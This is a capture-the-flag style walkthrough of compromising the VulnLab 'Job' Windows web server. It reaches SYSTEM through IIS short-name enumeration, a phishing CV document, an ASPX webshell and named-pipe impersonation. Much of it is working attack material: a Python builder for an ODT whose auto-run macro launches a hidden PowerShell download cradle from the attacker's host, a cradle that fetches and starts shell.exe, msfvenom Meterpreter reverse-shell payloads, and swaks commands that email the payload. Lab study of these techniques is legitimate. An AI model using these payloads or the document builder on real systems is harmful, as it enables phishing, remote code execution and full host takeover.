VL-Job

Vulnlab Job: Exploiting Document Macros to Compromise Windows Web Server

In this detailed VulnLab walkthrough of the “Job” machine, we demonstrate how an insecure resume submission process can lead to full system compromise of a Windows-based web server. Starting with IIS short name vulnerability discovery, we leverage a job application portal’s request for LibreOffice documents to deliver malicious macros that establish initial access. The walkthrough progresses through lateral movement by exploiting developer group permissions to plant web shells, followed by service impersonation techniques for privilege escalation to SYSTEM. This step-by-step pentesting guide highlights the dangers of processing untrusted documents, insufficient application security controls, and improper service configurations in corporate environments.

Initial Enumeration

Initial port scan revealed several open ports:

PORT     STATE SERVICE       REASON          VERSION
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0

Vulnerability Discovery

After noticing IIS, I checked for the IIS short name (8.3 tilde) enumeration vulnerability with irsdl's IIS-ShortName-Scanner. The bug is a response oracle: for a wildcard path such as /*~1*/.rem, IIS answers differently depending on whether an 8.3 short name matching the pattern exists in the web root, so file and directory names can be guessed one character at a time:

java -jar iis_shortname_scanner.jar 2 20 http://10.10.94.31/

The scan revealed the server is vulnerable and identified some files:

Scanning...

Testing request method: "OPTIONS" with magic part: "/~1/.rem" ...
Early result: the target is probably vulnerable.
Early result: identified letters in names > A,D,E,H,I,L,N,O,P,S,T,X
Early result: identified letters in extensions > A,H,M,P,S,T
File: HELLO~1.ASP
Dir: ASPNET~1
File: INDEX~1.HTM
[\] INDEX~1.HTT
# IIS Short Name (8.3) Scanner version 2023.4 - scan initiated 2025/04/02 17:40:37
Target: http://10.10.94.31/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/.rem
|_ Extra information:
|_ Number of sent requests: 444
|_ Identified directories: 1
|_ ASPNET~1
|_ Identified files: 2
|_ HELLO~1.ASP
|_ Actual file name = HELLO
|_ INDEX~1.HTM
|_ Actual file name = INDEX
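To show what the scanner's 400-versus-404 oracle actually does, here is an added example (not code from this walkthrough or from IIS-ShortName-Scanner) that re-implements the search against a constructed in-memory model of a vulnerable web root. The `request` callable stands in for sending `OPTIONS /<pattern>/.rem` to the server, and the three short names in the sample are the ones the scan above reported:

```python
"""Simulated IIS 8.3 short-name enumeration (added example, offline)."""
import fnmatch

# Alphabet to try; the real tool also covers a few extra symbols.
CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"


def simulated_iis(short_names):
    """Constructed oracle mimicking a vulnerable IIS host: 404 when the
    wildcard pattern matches an existing 8.3 name in the web root, 400
    otherwise. That status difference is the whole information leak."""
    names = [n.upper() for n in short_names]

    def request(pattern):
        hit = any(fnmatch.fnmatchcase(n, pattern.upper()) for n in names)
        return 404 if hit else 400

    return request


class ShortNameScanner:
    def __init__(self, request, charset=CHARSET):
        self.request = request
        self.charset = charset
        self.sent = 0  # request counter, like the tool's summary line

    def exists(self, pattern):
        self.sent += 1
        return self.request(pattern) == 404

    def is_vulnerable(self):
        # Any short name at all? A host with 8.3 names disabled answers 400.
        return self.exists("*~1*")

    def letters_in_use(self, in_extension=False):
        # Cheap pre-pass: which characters occur anywhere in names/extensions.
        tmpl = "*~1.*{}*" if in_extension else "*{}*~1*"
        return [c for c in self.charset if self.exists(tmpl.format(c))]

    def enumerate(self):
        """Depth-first search, one character at a time. Returns a sorted list
        of (short_name, kind). Only the ~1 suffix is searched; name collisions
        (~2, ~3, ...) need the same loop with a different tilde number."""
        if not self.is_vulnerable():
            return []
        name_chars = self.letters_in_use()
        ext_chars = self.letters_in_use(in_extension=True)
        found, stack = [], [""]
        while stack:
            prefix = stack.pop()
            for c in name_chars:
                cand = prefix + c
                if not self.exists(f"{cand}*~1*"):
                    continue                        # nothing starts with cand
                if self.exists(f"{cand}~1*"):       # a name is exactly cand
                    found.extend(self._extensions(cand, ext_chars))
                if len(cand) < 6:                   # 8.3 keeps 6 chars before ~N
                    stack.append(cand)
        return sorted(found)

    def _extensions(self, name, ext_chars):
        results = []
        if self.exists(f"{name}~1"):                # exact hit with no extension
            results.append((f"{name}~1", "dir"))    # (or an extension-less file)
        stack = [""]
        while stack:
            ext = stack.pop()
            for c in ext_chars:
                cand = ext + c
                if not self.exists(f"{name}~1.{cand}*"):
                    continue
                if self.exists(f"{name}~1.{cand}"):
                    results.append((f"{name}~1.{cand}", "file"))
                if len(cand) < 3:                   # ... and 3 chars of extension
                    stack.append(cand)
        return results


if __name__ == "__main__":
    # Constructed web root matching the walkthrough's scan results.
    scanner = ShortNameScanner(
        simulated_iis(["HELLO~1.ASP", "INDEX~1.HTM", "ASPNET~1"]))
    for short, kind in scanner.enumerate():
        print(f"{kind:4} {short}")
    print("requests sent:", scanner.sent)
```

Against a live host, swap `simulated_iis(...)` for a function that issues the OPTIONS request and returns the HTTP status code; the same search then reproduces the tool's letter lists. Keep in mind that the extension is truncated to three characters, so `HELLO~1.ASP` can stand for HELLO.ASP or HELLO.ASPX. On the server side, turning off 8.3 name creation with `fsutil 8dot3name set 1` is not enough on its own, because already existing short names survive; they have to be removed with `fsutil 8dot3name strip` on the web root.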

The 8.3 format keeps only three characters of the extension, so HELLO~1.ASP can be HELLO.ASP or HELLO.ASPX. The second guess was right, and the __VIEWSTATE fields in the response confirm an ASP.NET page:

curl http://10.10.94.31/HELLO.ASPX             

<html xmlns="www.w3.org/1999/xhtml">
<head><title>

</title></head>
<body>
<form method="post" action="./HELLO.ASPX" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg0NTYxMzIxNWRksO0e53iBgOk1F32mZVsjTztyPJmhrJc1OInj8vzB5Gk=" />

<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="D4124C05" />
<div>

Hello World

</div>
</form>
</body>
</html>

I discovered a message on the website stating: “Please send your application to career@job.local! We recently switched to using open source products - please send your cv as a libre office document.”

Initial Access Strategy

This presented an opportunity: a document that a person on the Windows host will open. Metasploit's auxiliary/fileformat/odt_badodt module builds an ODT that references a UNC path on the attacker's machine; when the document is loaded, Windows fetches that path over SMB with the opener's credentials, leaking a NetNTLMv2 response to a listener such as Responder. The module writes the file to ~/.msf4/local/bad.odt:

use auxiliary/fileformat/odt_badodt
set LHOST 10.8.5.195
run

To capture hashes, I set up Responder:

sudo responder -I tun0 -dwv

Then sent a malicious ODT file via email:

sudo swaks --to career@job.local --from fake@example.com --server 10.10.94.31 --attach @/root/.msf4/local/bad.odt --header "Subject: Application" --body "Hello, I am a software developer and I would like to apply for the job"

[Screenshot: Responder captures the NetNTLMv2 hash of the user who opened the document]
After capturing the hash, I attempted to crack it:

hashcat -m 5600 hash9099.txt /usr/share/wordlists/rockyou.txt
Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JACK.BLACK::JOB:16c1cb50aabefdf2:b4ad21b5ac50c9dc89...000000
Time.Started.....: Wed Apr 2 18:41:19 2025 (7 secs)
Time.Estimated...: Wed Apr 2 18:41:26 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2066.3 kH/s (1.50ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 66c Util: 69%

Unfortunately, the hash cracking attempt was unsuccessful.

Alternative Approach - Macro Exploitation

Since the document is clearly being opened in LibreOffice on the target, I created a LibreOffice Basic macro that launches a PowerShell stager, attached to the document's Open Document event so it runs as soon as the reviewer opens the CV (the five screenshots of the macro creation are not reproduced here):
[Screenshots: macro creation, parts 1 to 5]
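The macro screenshots are not reproduced above, so the following added example (not the author's macro and not code from any tool) shows how such a document is put together and, for the defensive side, how to spot one. It writes the package members LibreOffice itself uses for a document-local Basic library and binds Standard.Module1.Main to the Open Document (`dom:load`) event. The PowerShell stager and the http://10.8.5.195/shell.ps1 URL are assumptions standing in for the lab listener, and the macro only runs where the reader's LibreOffice macro security level allows document macros:

```python
"""Build an ODT whose Basic macro runs on Open Document, and inspect one.
Added example; package layout mirrors what LibreOffice stores for a
document-local Basic library. Stager command and address are assumptions."""
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

MIMETYPE = "application/vnd.oasis.opendocument.text"
NS = {
    "office": "urn:oasis:names:tc:opendocument:xmlns:office:1.0",
    "text": "urn:oasis:names:tc:opendocument:xmlns:text:1.0",
    "script": "urn:oasis:names:tc:opendocument:xmlns:script:1.0",
    "xlink": "http://www.w3.org/1999/xlink",
}
# Assumed download cradle (hypothetical URL); Shell()'s window style 0 hides it.
STAGER = "powershell.exe"
STAGER_ARGS = "-nop -w hidden -c IEX(IWR http://10.8.5.195/shell.ps1 -UseBasicParsing)"


def basic_module(program, args):
    """Basic source for Standard.Module1.Main; a quote in a Basic string is doubled."""
    q = lambda s: s.replace('"', '""')
    return f'Sub Main\n    Shell("{q(program)}", 0, "{q(args)}")\nEnd Sub\n'


def build_odt(body_text, macro=True, program=STAGER, args=STAGER_ARGS):
    """Return ODT bytes. 'mimetype' must be the first member and stored, not deflated."""
    listener = (
        '<office:scripts><office:event-listeners>'
        '<script:event-listener script:language="ooo:script" script:event-name="dom:load" '
        'xlink:href="vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document"/>'
        '</office:event-listeners></office:scripts>'
    ) if macro else ""
    members = {"content.xml": (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<office:document-content xmlns:office="{NS["office"]}" xmlns:text="{NS["text"]}" '
        f'xmlns:script="{NS["script"]}" xmlns:xlink="{NS["xlink"]}" office:version="1.2">'
        f'{listener}<office:body><office:text><text:p>{escape(body_text)}</text:p>'
        '</office:text></office:body></office:document-content>')}
    if macro:
        lib = "http://openoffice.org/2000/library"
        members["Basic/script-lc.xml"] = (
            f'<library:libraries xmlns:library="{lib}" xmlns:xlink="{NS["xlink"]}">'
            '<library:library library:name="Standard" library:link="false"/></library:libraries>')
        members["Basic/Standard/script-lb.xml"] = (
            f'<library:library xmlns:library="{lib}" library:name="Standard" '
            'library:readonly="false" library:passwordprotected="false">'
            '<library:element library:name="Module1"/></library:library>')
        members["Basic/Standard/Module1.xml"] = (
            '<script:module xmlns:script="http://openoffice.org/2000/script" '
            f'script:name="Module1" script:language="StarBasic">'
            f'{escape(basic_module(program, args))}</script:module>')
    entries = "".join(f'<manifest:file-entry manifest:full-path="{p}" '
                      'manifest:media-type="text/xml"/>' for p in members)
    members["META-INF/manifest.xml"] = (
        '<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" '
        f'manifest:version="1.2"><manifest:file-entry manifest:full-path="/" '
        f'manifest:version="1.2" manifest:media-type="{MIMETYPE}"/>{entries}</manifest:manifest>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", MIMETYPE, compress_type=zipfile.ZIP_STORED)
        for name, xml in members.items():
            zf.writestr(name, xml, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def package_check(odt_bytes):
    """True when 'mimetype' is first and stored and every other member parses as XML."""
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        names = zf.namelist()
        if names[0] != "mimetype" or zf.getinfo("mimetype").compress_type != zipfile.ZIP_STORED:
            return False
        if zf.read("mimetype") != MIMETYPE.encode():
            return False
        for name in names[1:]:
            ET.fromstring(zf.read(name))  # raises on malformed XML
    return True


def macro_bindings(odt_bytes):
    """Defender-side check: (event, script URI) pairs wired up in content.xml,
    i.e. macros that fire without any click. Empty list for a clean document."""
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        root = ET.fromstring(zf.read("content.xml"))
    path = "office:scripts/office:event-listeners/script:event-listener"
    return [(el.get(f"{{{NS['script']}}}event-name"), el.get(f"{{{NS['xlink']}}}href"))
            for el in root.iterfind(path, NS)]


def macro_source(odt_bytes):
    """The embedded Basic source, or None when the package has no Standard library."""
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        if "Basic/Standard/Module1.xml" not in zf.namelist():
            return None
        return ET.fromstring(zf.read("Basic/Standard/Module1.xml")).text


if __name__ == "__main__":
    odt = build_odt("Constructed CV text: software developer applying for the job.")
    with open("cv.odt", "wb") as fh:
        fh.write(odt)
    print("event bindings:", macro_bindings(odt))
    print(macro_source(odt))
```

`macro_bindings` and `macro_source` are the checks a mail gateway or a reviewer can apply to an incoming CV before anyone opens it: a résumé has no business carrying an `office:event-listeners` block or a Basic library at all, and `Shell(` in the module source is the giveaway.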

Getting a Shell

I set up a HoaxShell listener:

hoaxshell -s 10.8.5.195 -p 4444

[Screenshot: HoaxShell listener ready]

Alternatively, we can generate raw Meterpreter shellcode and wrap it into an executable with DSVyper:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.5.195 LPORT=9091 -f raw -o shell.bin

[Screenshot: DSVyper shell creation]
For the macro, we'd use a PowerShell download cradle. IEX only executes PowerShell text, so the plain IEX(IWR ...) form fits a script such as the HoaxShell stager; a compiled payload like shell.exe has to be saved to disk and started:

powershell -w hidden -c "IWR http://10.8.5.195/shell.exe -OutFile $env:TEMP\shell.exe -UseBasicParsing; Start-Process $env:TEMP\shell.exe"

I sent the email with the malicious ODT file:

swaks --to career@job.local --header "Subject: Application CV" --body "Hello, I'm a software developer and I am searching for a job, please review my application." --attach @hello.odt --server 10.10.94.31

[Screenshot: successful shell callback as jack.black]

Privilege Escalation

For local reconnaissance I ran PowerUp's checks:

PS C:\Users\jack.black\Desktop > curl http://10.8.5.195/PowerUp.ps1 -o PowerUp.ps1
PS C:\Users\jack.black\Desktop > dir
Directory: C:\Users\jack.black\Desktop
PS C:\Users\jack.black\Desktop > Import-Module ./PowerUp.ps1
PS C:\Users\jack.black\Desktop > Invoke-AllChecks

Results showed:

HijackablePath : C:\Users\jack.black\AppData\Local\Microsoft\WindowsApps\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\jack.black\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command '...'

This approach didn't yield results: WindowsApps sits on the user's own PATH, so a DLL planted there is not searched by any privileged service.
What did matter is that jack.black is a member of the Developers group (`whoami /groups`), which has write access to the IIS web root C:\inetpub\wwwroot (`icacls C:\inetpub\wwwroot`). Anything placed there is served and executed by IIS under the application pool identity, so I placed an ASPX webshell in the wwwroot folder:
[Screenshot: webshell creation]
[Screenshot: web shell in action]
Set up another HoaxShell listener:

hoaxshell -s 10.8.5.195 --port 4433

I pasted the HoaxShell command into the webshell and got a new shell running as the IIS application pool account. That account holds SeImpersonatePrivilege (check with `whoami /priv`), which is exactly what the named pipe impersonation techniques need:
[Screenshot: shell running as the web application pool identity]

System Access

For obtaining full system access, I generated a Meterpreter payload:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.5.195 LPORT=9091 -f exe -o shell2.exe

I uploaded the payload and set up a multi/handler:
[Screenshot: Meterpreter multi/handler setup]
With the Meterpreter session running as the application pool identity, getsystem's named pipe impersonation worked: technique 5, the PrintSpooler variant, makes the spooler service connect to a pipe we own and then impersonates its SYSTEM token:

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > shell
Process 1828 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot>whoami
whoami
nt authority\system

C:\inetpub\wwwroot>

Conclusion

The Job machine was successfully compromised by chaining:

  1. A CV intake process that opens untrusted LibreOffice documents with macros allowed, giving code execution as the reviewing user
  2. Write access to the IIS web root for that user's group (Developers), which turned a user shell into code execution as the web application pool identity
  3. SeImpersonatePrivilege on that identity, abused through named pipe impersonation to reach SYSTEM

https://api.vulnlab.com/api/v1/share?id=4fcb82b4-05e4-4b83-ac24-42fdc137a063